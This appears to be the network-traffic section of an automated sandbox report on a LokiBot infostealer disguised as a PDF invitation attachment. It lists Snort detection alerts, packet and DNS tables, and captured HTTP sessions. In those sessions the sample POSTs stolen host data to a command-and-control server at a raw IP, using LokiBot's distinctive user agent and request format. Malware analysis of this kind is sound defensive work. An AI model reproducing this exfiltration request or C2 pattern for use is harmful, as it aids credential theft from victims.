                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      11/30/21-15:34:02.766162TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974880192.168.2.363.250.34.171
                      11/30/21-15:34:02.766162TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.363.250.34.171
                      11/30/21-15:34:02.766162TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.363.250.34.171
                      11/30/21-15:34:02.766162TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974880192.168.2.363.250.34.171
                      11/30/21-15:34:03.986641TCP1201ATTACK-RESPONSES 403 Forbidden804974863.250.34.171192.168.2.3
                      11/30/21-15:34:05.456819TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974980192.168.2.363.250.34.171
                      11/30/21-15:34:05.456819TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.363.250.34.171
                      11/30/21-15:34:05.456819TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.363.250.34.171
                      11/30/21-15:34:05.456819TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974980192.168.2.363.250.34.171
                      11/30/21-15:34:06.698424TCP1201ATTACK-RESPONSES 403 Forbidden804974963.250.34.171192.168.2.3
                      11/30/21-15:34:09.490068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.363.250.34.171
                      11/30/21-15:34:09.490068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.363.250.34.171
                      11/30/21-15:34:09.490068TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.363.250.34.171
                      11/30/21-15:34:09.490068TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.363.250.34.171
                      11/30/21-15:34:10.682764TCP1201ATTACK-RESPONSES 403 Forbidden804975263.250.34.171192.168.2.3

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 30, 2021 15:33:57.852580070 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:57.852644920 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:57.852777004 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:57.868158102 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:57.868192911 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:57.942569971 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:57.942682981 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:57.943434000 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:57.943536043 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:58.357105017 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:58.357147932 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:58.357425928 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:58.357494116 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:58.360340118 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:58.400871992 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:58.869539022 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:58.869641066 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:58.869812965 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:58.999186039 CET49746443192.168.2.3216.58.209.46
                      Nov 30, 2021 15:33:58.999216080 CET44349746216.58.209.46192.168.2.3
                      Nov 30, 2021 15:33:59.354198933 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.354237080 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.354490995 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.372540951 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.372566938 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.439462900 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.439601898 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.440380096 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.440483093 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.447597027 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.447621107 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.447956085 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.448050976 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.448609114 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.488869905 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.676558971 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.676718950 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.678764105 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.678884983 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.680835009 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.680957079 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.682427883 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.682507038 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.683881998 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.683948040 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.683962107 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.684001923 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.685405970 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.685492992 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.697701931 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.697798967 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.697812080 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.697855949 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.698426962 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.698491096 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.698501110 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.698544979 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.699737072 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.699800968 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.699807882 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.699852943 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.701227903 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.701296091 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.701303959 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.701343060 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.702755928 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.702820063 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.702828884 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.702872992 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.704212904 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.704278946 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.704287052 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.704329014 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.705746889 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.705818892 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.705831051 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.705874920 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.707312107 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.707385063 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.707406998 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.707449913 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.708589077 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.708664894 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.708684921 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.708734989 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.709969044 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.710037947 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.710057974 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.710108042 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.711294889 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.711364031 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.711384058 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.711430073 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.712613106 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.712680101 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.712680101 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.712698936 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.712724924 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.712749958 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.714006901 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.714081049 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.714098930 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.714143991 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.715296030 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.715367079 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.715384007 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.715439081 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.716622114 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.716692924 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.716711044 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.716754913 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.718825102 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.718909025 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.718925953 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.718975067 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.719331980 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.719428062 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.719441891 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.719485998 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.720485926 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.720556974 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.720572948 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.720627069 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.721394062 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.721466064 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.721482038 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.721539021 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.722392082 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.722472906 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.722490072 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.722532988 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.723181963 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.723259926 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.723275900 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.723336935 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.724215031 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.724420071 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.724436998 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.724488020 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.725109100 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.725178957 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.725194931 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.725239038 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.725956917 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.726033926 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.726037979 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.726054907 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.726080894 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.726113081 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.726918936 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.726982117 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.726999044 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.727044106 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.727720022 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.727775097 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.727791071 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.727832079 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.728691101 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.728748083 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.728765011 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.728812933 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.729548931 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.729619026 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.729635000 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.729676962 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.730490923 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.730550051 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.730566025 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.730607033 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.731389046 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.731448889 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.731466055 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.731508017 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.732218027 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.732285023 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.732301950 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.732352972 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.733107090 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.733166933 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.733184099 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.733232021 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.734086990 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.734157085 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.734169006 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.734210968 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.734894991 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.734966040 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.734976053 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.735018015 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.735848904 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.735918999 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.735924006 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.735941887 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.735966921 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.736011028 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.736017942 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.736037970 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:33:59.736057997 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.736074924 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.948260069 CET49747443192.168.2.3216.58.208.129
                      Nov 30, 2021 15:33:59.948288918 CET44349747216.58.208.129192.168.2.3
                      Nov 30, 2021 15:34:02.456432104 CET4974880192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:02.753258944 CET804974863.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:02.753566980 CET4974880192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:02.766161919 CET4974880192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:03.056709051 CET804974863.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:03.056988955 CET4974880192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:03.349251986 CET804974863.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:03.986640930 CET804974863.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:03.986665010 CET804974863.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:03.986825943 CET4974880192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:03.988415003 CET4974880192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:04.285831928 CET804974863.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:05.134186983 CET4974980192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:05.452347994 CET804974963.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:05.452526093 CET4974980192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:05.456819057 CET4974980192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:05.770030022 CET804974963.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:05.770293951 CET4974980192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:06.090395927 CET804974963.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:06.698424101 CET804974963.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:06.698457003 CET804974963.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:06.698561907 CET4974980192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:06.699342966 CET4974980192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:07.001230955 CET804974963.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:09.165364027 CET4975280192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:09.484764099 CET804975263.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:09.484972954 CET4975280192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:09.490067959 CET4975280192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:09.809833050 CET804975263.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:09.809978008 CET4975280192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:10.101295948 CET804975263.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:10.682764053 CET804975263.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:10.682941914 CET804975263.250.34.171192.168.2.3
                      Nov 30, 2021 15:34:10.683027983 CET4975280192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:10.683564901 CET4975280192.168.2.363.250.34.171
                      Nov 30, 2021 15:34:10.972251892 CET804975263.250.34.171192.168.2.3

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 30, 2021 15:33:57.795687914 CET5787553192.168.2.38.8.8.8
                      Nov 30, 2021 15:33:57.823571920 CET53578758.8.8.8192.168.2.3
                      Nov 30, 2021 15:33:59.324996948 CET5415453192.168.2.38.8.8.8
                      Nov 30, 2021 15:33:59.351377010 CET53541548.8.8.8192.168.2.3

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Nov 30, 2021 15:33:57.795687914 CET192.168.2.38.8.8.80x940cStandard query (0)drive.google.comA (IP address)IN (0x0001)
                      Nov 30, 2021 15:33:59.324996948 CET192.168.2.38.8.8.80xebcbStandard query (0)doc-0g-14-docs.googleusercontent.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Nov 30, 2021 15:33:57.823571920 CET8.8.8.8192.168.2.30x940cNo error (0)drive.google.com216.58.209.46A (IP address)IN (0x0001)
                      Nov 30, 2021 15:33:59.351377010 CET8.8.8.8192.168.2.30xebcbNo error (0)doc-0g-14-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                      Nov 30, 2021 15:33:59.351377010 CET8.8.8.8192.168.2.30xebcbNo error (0)googlehosted.l.googleusercontent.com216.58.208.129A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • drive.google.com
                      • doc-0g-14-docs.googleusercontent.com
                      • 63.250.34.171

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349746216.58.209.46443C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.349747216.58.208.129443C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.34974863.250.34.17180C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      TimestampkBytes transferredDirectionData
                      Nov 30, 2021 15:34:02.766161919 CET1407OUTPOST /tickets.php?id=156 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 63.250.34.171
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 413CA904
                      Content-Length: 190
                      Connection: close
                      Nov 30, 2021 15:34:03.056988955 CET1407OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 33 00 35 00 33 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: 'ckav.ruhardz035347DESKTOP-716T771k08F9C4E9C79A3B52B3F739430Foa2v
                      Nov 30, 2021 15:34:03.986640930 CET1408INHTTP/1.1 403 Forbidden
                      Date: Tue, 30 Nov 2021 14:34:02 GMT
                      Server: Apache/2.4.38 (Debian)
                      Content-Length: 287
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.34974963.250.34.17180C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      TimestampkBytes transferredDirectionData
                      Nov 30, 2021 15:34:05.456819057 CET1409OUTPOST /tickets.php?id=156 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 63.250.34.171
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 413CA904
                      Content-Length: 190
                      Connection: close
                      Nov 30, 2021 15:34:05.770293951 CET1409OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 33 00 35 00 33 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                      Data Ascii: 'ckav.ruhardz035347DESKTOP-716T771+08F9C4E9C79A3B52B3F739430TKD2U
                      Nov 30, 2021 15:34:06.698424101 CET1410INHTTP/1.1 403 Forbidden
                      Date: Tue, 30 Nov 2021 14:34:05 GMT
                      Server: Apache/2.4.38 (Debian)
                      Content-Length: 287
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.34975263.250.34.17180C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
